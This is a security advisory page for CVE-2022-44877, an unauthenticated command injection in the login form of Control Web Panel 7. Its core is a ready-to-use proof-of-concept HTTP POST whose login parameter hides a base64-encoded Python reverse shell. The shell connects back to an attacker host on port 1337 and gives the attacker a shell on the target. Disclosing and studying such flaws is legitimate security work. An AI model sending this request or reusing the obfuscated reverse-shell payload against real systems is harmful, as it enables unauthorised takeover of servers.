Control Web Panel 7 Remote Code Execution

2023.01.09
Credit: numan turle
Risk: High
Local: No
Remote: Yes
CWE: N/A

[+] Centos Web Panel 7 Unauthenticated Remote Code Execution [+] Centos Web Panel 7 - < 0.9.8.1147 [+] Affected Component ip:2031/login/index.php?login=$(whoami) [+] Discoverer: Numan Trle @ Gais Cyber Security [+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194 [+] CVE: CVE-2022-44877 Description -------------- Bash commands can be run because double quotes are used to log incorrect entries to the system. Video Proof of Concept -------------- https://www.youtube.com/watch?v=kiLfSvc1SYY Proof of concept: -------------- POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1 Host: 10.13.37.10:2031 Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82 Content-Length: 40 Origin: https://10.13.37.10:2031 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: https://10.13.37.10:2031/login/index.php?login=failed Accept-Encoding: gzip, deflate Accept-Language: en Connection: close username=root&password=toor&commit=Login -------------- Solution -------- Upgrade to CWP7 current version.


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com

 

Back to Top